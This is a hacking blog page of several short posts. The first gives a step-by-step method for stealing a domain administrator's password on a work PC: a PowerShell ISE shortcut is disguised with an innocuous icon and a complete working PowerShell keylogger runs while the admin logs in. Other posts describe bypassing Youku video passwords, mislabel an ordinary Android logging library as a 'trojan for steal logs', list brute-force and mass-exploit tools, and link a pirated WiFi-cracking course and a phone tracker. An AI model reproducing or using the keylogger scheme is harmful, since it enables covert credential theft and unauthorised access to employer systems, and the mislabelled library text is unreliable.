Search This Blog

Powered by Blogger.

How to get an admin password on a work PC in an Active Directory domain?

  ⚙How to get an admin password on a work PC in an Active Directory domain? A) First, find the location of the shortcut for the installed Po...

Sunday, November 8, 2020

How to get an admin password on a work PC in an Active Directory domain?


 ⚙How to get an admin password on a work PC in an Active Directory domain?


A) First, find the location of the shortcut for the installed PowerShell ISE. Usually it is located at C: \ Users \ Username \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Windows PowerShell, find the Windows PowerShell ISE file and in the properties, on the shortcut tab change its shortcut to something inconspicuous, for example an icon of a folder or an icon of software allowed in the organization in * .ico format, for example 1C.

B) I will indicate the shortcut of the IE browser, since everyone has it and is often not prohibited from use by security policies, since most government sites work correctly on the client side only on it. Now, after launch, the IE icon will be displayed in the start menu bar, which will not arouse suspicion.


c) Then open Windows PowerShell ISE and copy the keylogger script code:

#requires -Version 2

function Start-KeyLogger ($ Path = "$ env: temp \ keylogger.txt")

{

# Signatures for API Calls

$ signatures = @ '

[DllImport ("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]

public static extern short GetAsyncKeyState (int virtualKeyCode);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int GetKeyboardState (byte [] keystate);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int MapVirtualKey (uint uCode, int uMapType);

[DllImport ("user32.dll", CharSet = CharSet.Auto)]

public static extern int ToUnicode (uint wVirtKey, uint wScanCode, byte [] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);

'@

# load signatures and make members available

$ API = Add-Type -MemberDefinition $ signatures -Name 'Win32' -Namespace API -PassThru


# create output file

$ null = New-Item -Path $ Path -ItemType File -Force

try

{

Write-Host 'Recording key presses. Press CTRL + C to see results. ' -ForegroundColor Red




# create endless loop. When user presses CTRL + C, finally-block

# executes and shows the collected key presses

while ($ true) {

Start-Sleep -Milliseconds 40



# scan all ASCII codes above 8

for ($ ascii = 9; $ ascii -le 254; $ ascii ++) {

# get current key state

$ state = $ API :: GetAsyncKeyState ($ ascii)




# is key pressed?

if ($ state -eq -32767) {

$ null = [console] :: CapsLock




# translate scan code to real code

$ virtualKey = $ API :: MapVirtualKey ($ ascii, 3)




# get keyboard state for virtual keys

$ kbstate = New-Object Byte [] 256

$ checkkbstate = $ API :: GetKeyboardState ($ kbstate)




# prepare a StringBuilder to receive input key

$ mychar = New-Object -TypeName System.Text.StringBuilder




# translate virtual key

$ success = $ API :: ToUnicode ($ ascii, $ virtualKey, $ kbstate, $ mychar, $ mychar.Capacity, 0)




if ($ success)

{

# add key to logger file

[System.IO.File] :: AppendAllText ($ Path, $ mychar, [System.Text.Encoding] :: Unicode)

}

}

}

}

}

finally

{

# open logger file in Notepad

notepad $ Path

}

}




# records all key presses until script is aborted by pressing CTRL + C

# will then open the file with collected key codes

๐Ÿฆ‘Start-KeyLogger

Now we create an application for installing software or ask the admin to install some legitimate program for us. Before the administrator connects to you remotely or comes in person for the specified work, we launch our script with the Run script command

BY  ABSHQ

Youku video cracking method with password


 Youku video cracking method with password :


1) You can set independent playback passwords for videos on Youku website, but you know: You don’t need a password to watch Youku videos with a password. The following describes two methods for cracking Youku video password.

Youku video password cracking 1:

2) Open the FLV analysis website, which is recommended here: http://www.flvcd.com, copy the Youku video address to be decrypted from the browser address bar, and paste the video address into the address box of the FLV analysis website , Click "Start GO to analyze. Get the real download address of the video file, right-click the download address, and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc. to download, the speed is very fast).

3)Youku Video Password cracking method 2:

Just add "xia" (without double quotes) in front of the video address youku. For example, http://v.youku.comv_sohw/id_xntg1mzc4ndq=.html, just change it to http://v .xiayouku.com/v_show/id_xntg1mzc4ndq=.html, the real download address of the video file can be parsed by typing in the browser. The next operation is the same as step 3 of method 1.


Use for Learn !!

BY ABSHQ

A TROJAN FOR STEAL LOGS


 A TROJAN FOR STEAL LOGS:


F E A T U R E S :

Concise API, it is easy to achieve diary record function through a few lines of code;

Use the AOP technologies Lancet SDK, it is comfortable to collect common logs, also support incremental compile;

Use mmap technology to ensure the efficiency of log records;
Scalability, developers can customize the log file to achieve the purpose of the upload;

Small traffic overhead, remote control user log file upload or not by online configuration;

High stability, it is very stable at many apps.

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

DOWNLOAD https://github.com/eleme/Trojan

Add in the root directory's build.gradle:

buildscript {
dependencies {
......
classpath 'me.ele:lancet-plugin:1.0.2'
}
}
Add in the app directory's build.gradle:

apply plugin: 'me.ele.lancet'

dependencies {
......
provided 'me.ele:lancet-base:1.0.2'
compile 'me.ele:trojan-library:0.0.5'
}
Use

1) Initialization
Add in the custom Application:

TrojanConfig config = new TrojanConfig.Builder(this)
// Set user information
.userInfo("xxxx")
// Set device id
.deviceId("xxxx")
// Set cipher key if need encry log
.cipherKey("xxxx")
// Optional, save log file in sdcard by default
.logDir("xxxx")
// Console log switch, the default is open
.enableLog(true)
.build();
Trojan.init(config);
๐Ÿฆ‘Special Note:

The log files are stored in sdcard by default and will not be lost even if the application is uninstalled;
To be compatible with multiple processes, log files stored in their respective directories;
The log is not encrypted by default, we currently only provide TEA encryption in view for high efficiency。

2) Record the log
Trojan provides two ways to recode log:

Firstly:

Trojan.log("Trojan", "We have a nice day!");
Secondly:

List<String> msgList = new LinkedList <>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);
By default, a single line log is not encrypted, and if you need to encrypt it, the following is used:

Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or switch users, you can call:

Trojan.refreshUser("new user info");
Of course, if the user logs out, you can pass a null value:

Trojan.refreshUser(null);
4) Upload Solution
In Demo we provided free and simple way such as LeanCloud to upload log file, you can browse, download and download log file.

5) Data Decryption
When we set the encryption key, we can encrypt a single log to ensure the security of sensitive data. We must decrypt the encrypted data When we analyze the log. Use the decryption script as follows:

Compile and generate decryption SO library on MAC, The so library has been generated in the repository. This step can be omitted:

gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call python script to decrypt the data on MAC, you need to pass in the decryption key and file path to be decrypted, it should be noted that the path of the python script:

python ./trojan_decrypt.py cipher-key cipher-file-path


BY ABSHQ

SOME HACKER TOOLS

SOME HACKER TOOLS:


- CrawlBox - Easy way to brute-force web directory..![->](https://github.com/abaykan/CrawlBox/stargazers/)

- TrackOut - Simple Python IP Tracker.![->](https://github.com/abaykan/TrackOut/stargazers/)

- sslcaudit - No description provided![->](https://github.com/abbbe/sslcaudit/stargazers/)

- Sublist3r - Fast subdomains enumeration tool for penetration testers.![->](https://github.com/aboul3la/Sublist3r/stargazers/)

- doork - Passive Vulnerability Auditor.![->](https://github.com/AeonDave/doork/stargazers/)

- sir - Skype Ip Resolver.![->](https://github.com/AeonDave/sir/stargazers/)

- xl-py - No description provided![->](https://github.com/anggialberto/xl-py/stargazers/)

- netdiscover - netdiscover.![->](https://github.com/alexxy/netdiscover/stargazers/)

- ATSCAN - Advanced dork Search & Mass Exploit Scanner.![->]



BY ABSHQ

Saturday, November 7, 2020

LEARN CRACKING WIFI PASSWORDS KEYS WEP, WPA, WPA2 PAID COURSE FREE DOWNLOAD (GDRIVE)


 LEARN CRACKING WIFI PASSWORDS KEYS WEP, WPA, WPA2 PAID COURSE FREE DOWNLOAD (GDRIVE) :fire:


Course Topic :
Introduction
Preparation
Network Basic
WEB Cracking
WPAWPA2 Cracking
WPAWPA2 cracking & Exploiting WPS
WPAWPA2 Cracking - worldlist attack
WPAWPA2 Cracking - wpawpa2 enterprise
Protection

LINK::::::
https://drive.google.com/drive/u/0/mobile/folders/1-2BzL5wq053NDORK_CIS1BcrOpD2Lnmk

Enjoy


BY ABHSQ :+1:

How to track location of phone


 :beginner:How to track location of phone :beginner:

LINK::::::::::
:link:https://tricksbuilder.com/how-to-track-the-location-of-the-phone/

ENJOY


BY ABSHQ

 

Blogger news

Blogroll

About